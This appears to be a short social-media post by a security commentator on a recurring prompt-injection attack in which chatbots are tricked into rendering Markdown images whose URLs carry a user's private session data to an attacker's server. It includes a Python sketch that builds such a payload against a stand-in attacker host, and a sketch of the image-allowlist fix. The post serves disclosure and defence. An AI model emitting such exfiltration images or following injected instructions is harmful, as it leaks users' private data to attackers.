Simon Willison /
npub1gv2…tlwl
2024-06-16 00:57:15

The 6th example I've seen of the same prompt injection attack against LLM chatbots: https://embracethered.com/blog/posts/2024/github-copilot-chat-prompt-injection-data-exfiltration/

The attack involves tricking an LLM chatbot that has access to both private data and untrusted input into embedding a Markdown image whose URL points to an attacker's server, with private data extracted from the session encoded into that URL. When the chat UI renders the image, the user's browser fetches it automatically, delivering the data to the attacker with no click required.
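A minimal sketch of what the injected payload produces, assuming a hypothetical attacker host and helper name (neither is from any of the linked write-ups):

```python
import base64
import urllib.parse

def build_exfil_markdown(private_data: str, attacker_host: str) -> str:
    """Sketch of the exfiltration payload an injected prompt asks the model to emit."""
    # Encode the stolen data so it survives as a URL query parameter.
    payload = base64.urlsafe_b64encode(private_data.encode()).decode()
    url = f"https://{attacker_host}/log?q={urllib.parse.quote(payload)}"
    # Rendering this Markdown makes the browser request the "image",
    # sending the encoded data to the attacker's server.
    return f"![ ]({url})"

print(build_exfil_markdown("session secret: sk-example", "attacker.example"))
```

The key point is that the model never needs tool access: merely being allowed to emit Markdown that the UI renders is enough of an exfiltration channel.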

We've now seen this same attack in ChatGPT itself, Google Bard, Writer.com, Amazon Q and Google NotebookLM (all now fixed, thankfully).
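The fixes generally restrict which image URLs the chat UI will render. A rough sketch of that mitigation, assuming a hypothetical allowlist and function name (the actual vendor implementations are not published in this detail):

```python
import re

# Hypothetical allowlist of image hosts the UI trusts.
ALLOWED_IMAGE_HOSTS = {"trusted-cdn.example"}

# Matches Markdown images and captures the URL's host.
IMG_PATTERN = re.compile(r"!\[[^\]]*\]\((https?://([^/)\s]+)[^)]*)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Drop Markdown images pointing at hosts outside the allowlist,
    closing the automatic-fetch exfiltration channel."""
    def repl(match: re.Match) -> str:
        host = match.group(2).lower()
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return IMG_PATTERN.sub(repl, markdown)
```

With this filter in place, an injected `![ ](https://attacker.example/log?q=...)` is replaced before rendering, while images from trusted hosts still display.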

My collection: https://simonwillison.net/tags/markdownexfiltration/